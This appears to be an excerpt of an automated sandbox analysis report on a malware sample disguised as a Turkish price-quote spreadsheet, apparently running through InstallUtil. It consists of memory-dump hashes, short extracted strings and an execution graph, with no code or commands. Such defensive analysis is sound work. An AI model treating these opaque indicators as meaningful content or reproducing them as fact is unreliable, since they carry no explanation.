                                                  • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                  • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                  • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ff1d67bc2e4e25fbb3755c79ae0008d9fcb4b41a8521cd917fa81e5a9396567
                                                  • Instruction ID: 0ebbaac83b591c0da9a3ae99c0db50035fd6c6cdbec4798e28b95242e2852d25
                                                  • Opcode Fuzzy Hash: 3ff1d67bc2e4e25fbb3755c79ae0008d9fcb4b41a8521cd917fa81e5a9396567
                                                  • Instruction Fuzzy Hash: 8FD0E974E04318CFEB65CF25D855B99B7B1AB15315F0150D9954DA2251D7341D848F11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef771b67f66ac798b39cab361743046ff902de7545cc0d528420f786545e7ab1
                                                  • Instruction ID: 60452f772363a82e58eac414e62d801ab8ba4fc9ef82e5f508330686cbedf6f7
                                                  • Opcode Fuzzy Hash: ef771b67f66ac798b39cab361743046ff902de7545cc0d528420f786545e7ab1
                                                  • Instruction Fuzzy Hash: A6B09232100208AB8A009A84E904895BF69AB986007808025B6090A1218B33B822DB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &$\
                                                  • API String ID: 0-1353981753
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: true
                                                  • Associated: 00000000.00000002.2063212009.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b60000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq
                                                  • API String ID: 0-3092978723
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &
                                                  • API String ID: 0-1010288
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09df231247783d1b64a91abe374a028d97d59b48790918d275c738ff3901ccd2
                                                  • Instruction ID: e0db66285676ccad087bcfc30811eba62dcd194c03d80a3c13b33e720b7f7e26
                                                  • Opcode Fuzzy Hash: 09df231247783d1b64a91abe374a028d97d59b48790918d275c738ff3901ccd2
                                                  • Instruction Fuzzy Hash: A9415D71D05A588BEB1CCF6B9D4469EFAF3BFC8201F14C1B9940DA6255EB304586CF11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05a8154cce69de73f93f2be42f70e24768c56f06b907908caf05c09eb469e85e
                                                  • Instruction ID: 046a0479d46ed2f5e2fde4401281f240c3b6cd63c5fe2611b4e800c62b3ac65c
                                                  • Opcode Fuzzy Hash: 05a8154cce69de73f93f2be42f70e24768c56f06b907908caf05c09eb469e85e
                                                  • Instruction Fuzzy Hash: 6541DEB5C052589FCB00CFA9D584AEEFBF5BF09310F14906AE415B7240C738AA85CFA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25de58e6b6c367dbdf8c576cb41e02fe9c6fa2f88820d55e6caf632b2edf31d2
                                                  • Instruction ID: 9eb4602c1c76df768c5af47ef28e56095dcaa8a50566ee33b78324c4d5a9e766
                                                  • Opcode Fuzzy Hash: 25de58e6b6c367dbdf8c576cb41e02fe9c6fa2f88820d55e6caf632b2edf31d2
                                                  • Instruction Fuzzy Hash: CB41DEB5C052589FCB00CFA9D484AEEFBF5AF09310F14906AE415B7240C738AA85CFA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b671a6960a873ae9a0299b5592fc8f36da30cee58bbabc5e0953c0ec463703a
                                                  • Instruction ID: b7b9b0e6681e363d77604d38ad8ac872ff10c54c8457fa991740c4c007200533
                                                  • Opcode Fuzzy Hash: 3b671a6960a873ae9a0299b5592fc8f36da30cee58bbabc5e0953c0ec463703a
                                                  • Instruction Fuzzy Hash: 6F4186B0D016288BEB68CF6BDD5879EFAF6BF89304F14C1A9C518A7264DB740985CF41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3ffaab0035b2ae9fc8a9b4511b01875c35e331871e02444a4b14a399e1b9ac5
                                                  • Instruction ID: 89eb3b7621bbb26658d684f208060959d5e37fd7be14fbd17ad90a5e68fa0fba
                                                  • Opcode Fuzzy Hash: d3ffaab0035b2ae9fc8a9b4511b01875c35e331871e02444a4b14a399e1b9ac5
                                                  • Instruction Fuzzy Hash: 1A31FBB1D087658FEB29CF2BCC49799BBF3AF85304F04C0EAD4489A255EB740A859F11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcf8fe6438eedb45e296ec0c16d42c20705b9fdb29cb4993551e88dd4ed4485c
                                                  • Instruction ID: 4562ecf5dec30d5355118ac7f930906a5a8bc6566561e5d5047e43667088376a
                                                  • Opcode Fuzzy Hash: dcf8fe6438eedb45e296ec0c16d42c20705b9fdb29cb4993551e88dd4ed4485c
                                                  • Instruction Fuzzy Hash: ED3130B1D056549BEF19CF6BD8846E9BBB3AFCA300F14C0FAD4486A214CB321A55DF41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 708e12ed26507663608ec2d651689b930f1740792d5b8eaf3929be857f3a0e08
                                                  • Instruction ID: d1aa9621f4e01eaad6685cbbbe0e53116efabb79bf216046ae8cc707bc51d55a
                                                  • Opcode Fuzzy Hash: 708e12ed26507663608ec2d651689b930f1740792d5b8eaf3929be857f3a0e08
                                                  • Instruction Fuzzy Hash: 3721FDB5C042089FCB10DFA9D980AEEBBF5FB49310F14906AE809B3310C735A945CFA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a046172c690e9d88cceeee44956de79996ec7386dd7a7350736e6a0ceebc20c
                                                  • Instruction ID: e14f72a3511241c1589fb5e511e2ee606480100ec5091d7e5eaad942a1acbd24
                                                  • Opcode Fuzzy Hash: 7a046172c690e9d88cceeee44956de79996ec7386dd7a7350736e6a0ceebc20c
                                                  • Instruction Fuzzy Hash: 193142B1E116188BEB28CF6BDD5478AFAF7BFC9304F04C1A9C408AA264DB7505868F41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3fb0d024396a039e39cfae5d1f0046e5758ed84d96a9b2218c1ca5faa0ba9dcb
                                                  • Instruction ID: e7b81d9b67cc739c731bbe8430e0b754864f2584716f000056f66eaf24f194e8
                                                  • Opcode Fuzzy Hash: 3fb0d024396a039e39cfae5d1f0046e5758ed84d96a9b2218c1ca5faa0ba9dcb
                                                  • Instruction Fuzzy Hash: CB21DDB5D042089BCB14DFA9D980AEEBBF5BB49310F10906AE809B7210C735A945CFA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3bf647a714f79b59d5f4524968882b7da744d3abad0730e72aac6d26bffb3b1
                                                  • Instruction ID: 2e62208a216d4abffe6a438090f8de181c1b7f4f390a0eda0b356a724a2e033f
                                                  • Opcode Fuzzy Hash: d3bf647a714f79b59d5f4524968882b7da744d3abad0730e72aac6d26bffb3b1
                                                  • Instruction Fuzzy Hash: 4321D3B1E056188BEB18CFABD9447DDFAFBAFC8300F04C06AD519AA254DB7409468F40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f055f78fa743a25cfab2e6c813f7dff181988898e98034b4a26bd8d2365fc7ca
                                                  • Instruction ID: 995cbb9cc6253322a6fbc37cfc3d89671cdda8129e688224bc5b5d25acf28160
                                                  • Opcode Fuzzy Hash: f055f78fa743a25cfab2e6c813f7dff181988898e98034b4a26bd8d2365fc7ca
                                                  • Instruction Fuzzy Hash: 3611C43251DBE18FC7468738852D285BFF0DF132147BA90DEC984DF663D2256916CB89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edc7e8b44167065481126ac6303b543cb688d238c5b723fba57c0f2bcdf0a432
                                                  • Instruction ID: 7be454211219c20e99ed5f00216c849575762cdee09fd624266687e6eff41eb4
                                                  • Opcode Fuzzy Hash: edc7e8b44167065481126ac6303b543cb688d238c5b723fba57c0f2bcdf0a432
                                                  • Instruction Fuzzy Hash: D221C3B1D056189BEB18CF6BD9847DEFAFBBFC8300F14C06AD409AA264EB7409458F51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89c3ecd6c44fe259a2c7e7880be6dfe8f28f06a6e9d294797c3810bc077066c1
                                                  • Instruction ID: 0d6249b432d9c988078899e39b5f5fa233496ecc9e87f26091e229b1030a9b64
                                                  • Opcode Fuzzy Hash: 89c3ecd6c44fe259a2c7e7880be6dfe8f28f06a6e9d294797c3810bc077066c1
                                                  • Instruction Fuzzy Hash: 021107B1D146188BEB58CFABC84579EFAFBABC8300F14C57AD818A7255EB705546CF40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (_]q$(_]q$(_]q$(_]q
                                                  • API String ID: 0-2651352888
                                                  • Opcode ID: f417f25481d7234fef1882fd0c32935b92c9f197db5df0397f3b4833a1d59c5a
                                                  • Instruction ID: df4cc22d86d773bcf2e5ece5912da9b5e6874566871dc30cd462044674b0fb9d
                                                  • Opcode Fuzzy Hash: f417f25481d7234fef1882fd0c32935b92c9f197db5df0397f3b4833a1d59c5a
                                                  • Instruction Fuzzy Hash: B771B375F042048FC704AF78E4959AE7FB6EF8A308B5584A9D406DB3A1DB31EC46CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -$2$5$t
                                                  • API String ID: 0-3752484981
                                                  • Opcode ID: 652128084f65f9757f2e3a4006a4c31eed88ae52eb39ef9b2c476dcafa69f9ba
                                                  • Instruction ID: b03596e4607a404d1472bce13a2958b9d9b0ff2e48886b6c6502014d5b4e749c
                                                  • Opcode Fuzzy Hash: 652128084f65f9757f2e3a4006a4c31eed88ae52eb39ef9b2c476dcafa69f9ba
                                                  • Instruction Fuzzy Hash: B41180B4915228CFDB22DFA4D988B9DBBB2BB0C315F246299D009A7242C7749984DF14

                                                  Execution Graph

                                                  Execution Coverage:17.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:23.3%
                                                  Total number of Nodes:30
                                                  Total number of Limit Nodes:7
                                                  execution_graph 19821 6449c70 19822 6449c9d 19821->19822 19824 644bb7f 19822->19824 19826 6449fa6 19822->19826 19827 6449328 19822->19827 19825 6449328 2 API calls 19825->19826 19826->19824 19826->19825 19828 644933a 19827->19828 19830 644933f 19827->19830 19828->19826 19829 644957e LdrInitializeThunk 19833 6449619 19829->19833 19830->19828 19830->19829 19831 64496d9 19831->19826 19832 6449a69 LdrInitializeThunk 19832->19831 19833->19831 19833->19832 19834 105e018 19835 105e024 19834->19835 19838 6442568 19835->19838 19839 644258a 19838->19839 19840 105e0c3 19839->19840 19843 6449328 2 API calls 19839->19843 19844 644992c 19839->19844 19850 6449548 19839->19850 19843->19840 19845 64497e3 19844->19845 19846 6449924 LdrInitializeThunk 19845->19846 19849 6449328 2 API calls 19845->19849 19848 6449a81 19846->19848 19848->19840 19849->19845 19851 644957e LdrInitializeThunk 19850->19851 19852 6449579 19850->19852 19854 6449619 19851->19854 19852->19851 19853 64496d9 19853->19840 19854->19853 19855 6449924 LdrInitializeThunk 19854->19855 19857 6449328 2 API calls 19854->19857 19855->19853 19857->19854
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$4']q$4']q$4']q
                                                  • API String ID: 0-875651895
                                                  • Opcode ID: 252dfc7bcd73b6fc4bb02f94128b0b8e6fcbea71ebaafb304ce80eca9b6ce469
                                                  • Instruction ID: 380c8a0ba127de36151f72da9f9bd99a1130f947c8f8cf9faa98d09a202ec314
                                                  • Opcode Fuzzy Hash: 252dfc7bcd73b6fc4bb02f94128b0b8e6fcbea71ebaafb304ce80eca9b6ce469
                                                  • Instruction Fuzzy Hash: 99A28E30B04209CFCB55CF68C584AAFBBF2FF88310F158699E9859B266D735E941CB61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$Haq
                                                  • API String ID: 0-903699183
                                                  • Opcode ID: 7ef8ee47bf0b9806d8421e8813692eeba551da28e3759d45706f48de71fb1586
                                                  • Instruction ID: 3f27c661bc19b04240c7beac309fa01dc39e896ebbf1cd45fd34360dd3f4e0f6
                                                  • Opcode Fuzzy Hash: 7ef8ee47bf0b9806d8421e8813692eeba551da28e3759d45706f48de71fb1586
                                                  • Instruction Fuzzy Hash: 2012BC70A002198FDB55DF69C854AAFBBF6BF88300F208469E985DB395DF359D42CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
